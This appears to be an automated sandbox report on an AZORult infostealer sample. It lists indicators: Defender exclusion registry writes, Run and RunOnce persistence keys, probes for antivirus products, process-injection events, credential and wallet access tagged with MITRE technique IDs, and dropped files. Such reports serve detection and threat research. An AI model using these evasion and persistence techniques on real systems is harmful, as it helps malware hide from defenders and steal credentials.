azorult | e4f794cc5709baadef679519c84d622e7cf5654794399a227c5af246af0160de

System Information Discovery

Processes:

cmd.exe8CEH4UI8M.exef3y1k5c5r3s.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	8CEH4UI8M.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	f3y1k5c5r3s.tmp

Loads dropped DLL 64 IoCs

Processes:

okp5sltpt3j.tmpvict.tmpSetup3310.tmpvpn.tmpIBInstaller_97039.tmpf3y1k5c5r3s.tmpSetup.tmpregsvr32.exe74qACLReRlGN.exeregsvr32.exeregsvr32.exeapp.exe74qACLReRlGN.exeXaiSp82353Xk.exemask_svc.exepatch.exeMaskVPNUpdate.exe2303.tmp.exesoftware_reporter_tool.exefbwfgasvict.tmpSetup3310.tmpSetup.tmpRegAsm.exe

pid	process
1232	okp5sltpt3j.tmp
2936	vict.tmp
4172	Setup3310.tmp
4172	Setup3310.tmp
184	vpn.tmp
184	vpn.tmp
4440	IBInstaller_97039.tmp
4508	f3y1k5c5r3s.tmp
4508	f3y1k5c5r3s.tmp
4508	f3y1k5c5r3s.tmp
4508	f3y1k5c5r3s.tmp
4508	f3y1k5c5r3s.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
3812	Setup.tmp
3812	Setup.tmp
4168	regsvr32.exe
4720	74qACLReRlGN.exe
2216	regsvr32.exe
4504	regsvr32.exe
4568	app.exe
6556	74qACLReRlGN.exe
6016	XaiSp82353Xk.exe
6016	XaiSp82353Xk.exe
4756	mask_svc.exe
4756	mask_svc.exe
4756	mask_svc.exe
4756	mask_svc.exe
4756	mask_svc.exe
4756	mask_svc.exe
6584	patch.exe
6584	patch.exe
6584	patch.exe
184	vpn.tmp
184	vpn.tmp
6584	patch.exe
4212	MaskVPNUpdate.exe
4212	MaskVPNUpdate.exe
2412	2303.tmp.exe
2412	2303.tmp.exe
2412	2303.tmp.exe
2412	2303.tmp.exe
2412	2303.tmp.exe
2412	2303.tmp.exe
2412	2303.tmp.exe
2472	software_reporter_tool.exe
2472	software_reporter_tool.exe
2472	software_reporter_tool.exe
2472	software_reporter_tool.exe
2472	software_reporter_tool.exe
2472	software_reporter_tool.exe
2472	software_reporter_tool.exe
2472	software_reporter_tool.exe
5816	fbwfgas
3920	vict.tmp
10080	Setup3310.tmp
10080	Setup3310.tmp
6372	Setup.tmp
6372	Setup.tmp
10804	RegAsm.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

app.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\PatientWaterfall = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0"	app.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 14 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

multitimer.exeapp.exe397C.tmp.exemultitimer.exegcttt.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exe8CEH4UI8M.exemultitimer.exef3y1k5c5r3s.tmp

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\5rynxxs4grx = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\1Y69CJCV7S\\multitimer.exe\" 1 3.1615557406.604b731e1fb8d"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\PatientWaterfall = "\"C:\\Windows\\rss\\csrss.exe\""	app.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\""	397C.tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\my5gnf23tqu = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\U9OJLLB1CE\\multitimer.exe\" 1 3.1615557405.604b731d0b0fe"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\q4ym22hekni = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WHSIDII616\\multitimer.exe\" 1 3.1615558287.604b768f3e8bf"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\c5uslpwlmtk = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\X36W7PUU85\\multitimer.exe\" 1 3.1615558288.604b7690a166f"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hvhzhenqpje = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\MYWTM4MND3\\multitimer.exe\" 1 3.1615558288.604b76908257d"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\deuxdaimusa = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\IF5YHLUPB1\\multitimer.exe\" 1 3.1615557347.604b72e357f9e"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\u0ckxjkuga2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WTKV8Z9VG9\\multitimer.exe\" 1 3.1615557406.604b731e1d212"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\vilp3n4jojx = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6657TQJWI9\\multitimer.exe\" 1 3.1615558288.604b769024375"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\EJZ8CWALD4WYALZ = "\"C:\\Program Files\\8CEH4UI8MA\\8CEH4UI8M.exe\""	8CEH4UI8M.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\tqco0shnlog = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\MXXZ64B9M4\\multitimer.exe\" 1 3.1615557405.604b731dedf91"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\7159388 = "\"C:\\Users\\Admin\\AppData\\Roaming\\wvs5xnmrrl4\\f3y1k5c5r3s.exe\" /VERYSILENT"	f3y1k5c5r3s.tmp

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

Processes:

md2_2efs.exeYsU5j51khm0T.exevsVXhkLl7qyX.exe1AKMrCbJ3J6D.exeTk4lreAIt 9k.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	YsU5j51khm0T.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vsVXhkLl7qyX.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1AKMrCbJ3J6D.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Tk4lreAIt 9k.exe

Drops Chrome extension 1 IoCs

Processes:

askinstall24.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiogdnnnljjlfjgkifccooilblmjflkm\5.18.6_0\manifest.json	askinstall24.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 29 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
85	ipinfo.io
134	checkip.amazonaws.com
107112	api.ipify.org
144609	checkip.amazonaws.com
183808	checkip.amazonaws.com
67944	checkip.dyndns.org
70546	checkip.amazonaws.com
143918	checkip.dyndns.org
81067	checkip.amazonaws.com
102249	checkip.amazonaws.com
121970	checkip.amazonaws.com
87192	ipinfo.io
92667	checkip.amazonaws.com
112991	eth0.me
163728	checkip.amazonaws.com
40	api.ipify.org
83	ipinfo.io
111688	checkip.amazonaws.com
225	ip-api.com
6309	ipinfo.io
49330	checkip.amazonaws.com
132333	checkip.amazonaws.com
155311	checkip.amazonaws.com
174261	checkip.amazonaws.com
28078	checkip.dyndns.org
38083	checkip.amazonaws.com
58871	checkip.amazonaws.com
136999	api.ipify.org
152972	api.ipify.org

Maps connected drives based on registry 3 TTPs 18 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

multitimer.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in System32 directory 17 IoCs

Processes:

DrvInst.exetapinstall.exeDrvInst.exe

description	ioc	process
File opened for modification	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}\SET20B3.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}\SET20B3.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}\SET20C5.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}\SET20C5.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}\SET20C4.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}\SET20C4.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{453418e5-c8b4-464c-a7b9-8606f537f220}	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

mask_svc.exemask_svc.exemask_svc.exe

pid process

7092 mask_svc.exe
5900 mask_svc.exe
4756 mask_svc.exe

pid	process
7092	mask_svc.exe
5900	mask_svc.exe
4756	mask_svc.exe

Suspicious use of SetThreadContext 29 IoCs

Processes:

EA85.tmp.exeFkIw5o3KqG0E.exe74qACLReRlGN.exeRegAsm.exe8nz38 7KX19q.exe1CE6.tmp.exe3583.tmp.exe397C.tmp.exe216C.tmp.exeexplorer.exesppsvc.exefbwfgasFkIw5o3KqG0E.exeRegAsm.exeVeA5586ccCU3.exeVMbPdR4BX9Ct.exefbwfgas

description	pid	process	target process
PID 3956 set thread context of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 6000 set thread context of 416	6000	FkIw5o3KqG0E.exe	RegAsm.exe
PID 6000 set thread context of 4884	6000	FkIw5o3KqG0E.exe	RegAsm.exe
PID 6000 set thread context of 4196	6000	FkIw5o3KqG0E.exe	RegAsm.exe
PID 6000 set thread context of 5344	6000	FkIw5o3KqG0E.exe	RegAsm.exe
PID 6000 set thread context of 5364	6000	FkIw5o3KqG0E.exe	RegAsm.exe
PID 6000 set thread context of 4804	6000	FkIw5o3KqG0E.exe	RegAsm.exe
PID 6000 set thread context of 6116	6000	FkIw5o3KqG0E.exe	RegAsm.exe
PID 4720 set thread context of 6556	4720	74qACLReRlGN.exe	74qACLReRlGN.exe
PID 5344 set thread context of 6572	5344	RegAsm.exe	RegAsm.exe
PID 5444 set thread context of 6664	5444	8nz38 7KX19q.exe	8nz38 7KX19q.exe
PID 6204 set thread context of 4352	6204	1CE6.tmp.exe	AddInProcess32.exe
PID 4464 set thread context of 6720	4464	3583.tmp.exe	3583.tmp.exe
PID 5852 set thread context of 4152	5852	397C.tmp.exe	397C.tmp.exe
PID 6980 set thread context of 8800	6980	216C.tmp.exe	216C.tmp.exe
PID 4544 set thread context of 7280	4544	explorer.exe	explorer.exe
PID 3644 set thread context of 10120	3644	sppsvc.exe	sppsvc.exe
PID 10112 set thread context of 5816	10112	fbwfgas	fbwfgas
PID 7484 set thread context of 5984	7484	FkIw5o3KqG0E.exe	RegAsm.exe
PID 7484 set thread context of 5708	7484	FkIw5o3KqG0E.exe	RegAsm.exe
PID 7484 set thread context of 9916	7484	FkIw5o3KqG0E.exe	RegAsm.exe
PID 7484 set thread context of 3232	7484	FkIw5o3KqG0E.exe	RegAsm.exe
PID 7484 set thread context of 5432	7484	FkIw5o3KqG0E.exe	RegAsm.exe
PID 7484 set thread context of 10332	7484	FkIw5o3KqG0E.exe	RegAsm.exe
PID 9916 set thread context of 10804	9916	RegAsm.exe	RegAsm.exe
PID 10096 set thread context of 10860	10096	VeA5586ccCU3.exe	VeA5586ccCU3.exe
PID 308 set thread context of 10984	308	VMbPdR4BX9Ct.exe	VMbPdR4BX9Ct.exe
PID 7484 set thread context of 10828	7484	FkIw5o3KqG0E.exe	RegAsm.exe
PID 10764 set thread context of 4244	10764	fbwfgas	fbwfgas

Drops file in Program Files directory 64 IoCs

Processes:

IBInstaller_97039.tmpvpn.tmp7za.exezv3ykprswya.exe7za.exeapp.exeokp5sltpt3j.tmpvict.tmpapp.exe8CEH4UI8M.exe397C.tmp.exevict.tmp

description	ioc	process
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-MT2PE.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-4NRTG.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-S2GAA.tmp	vpn.tmp
File created	C:\Program Files (x86)\Wild-Dew\WinmonProcessMonitor.sys	7za.exe
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-UBRD5.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-DCG8Q.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-NST8A.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-NV7EU.tmp	vpn.tmp
File created	C:\Program Files\8CEH4UI8MA\uninstaller.exe.config	zv3ykprswya.exe
File created	C:\Program Files (x86)\MaskVPN\is-KUM72.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-PKUQG.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-L5HGU.tmp	vpn.tmp
File created	C:\Program Files (x86)\Wild-Dew\winamp.exe	7za.exe
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-89OCI.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-I1PLO.tmp	vpn.tmp
File created	C:\Program Files (x86)\Wild-Dew\NalDrv.sys	app.exe
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-BCSK2.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-B3LQ2.tmp	okp5sltpt3j.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-32VAB.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-TKOGS.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Globalization.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-D758N.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.msg	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\Wild-Dew\help.txt	app.exe
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-BQ92L.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-J7J04.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Host.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll	IBInstaller_97039.tmp
File created	C:\Program Files\8CEH4UI8MA\cast.config	8CEH4UI8M.exe
File created	C:\Program Files (x86)\Common Files\7a73b78f679a6fd6292fc2f8bcb54dbe4bc47010	397C.tmp.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-L6UUU.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-JFG7B.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-C5273.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-PRM2J.tmp	vpn.tmp
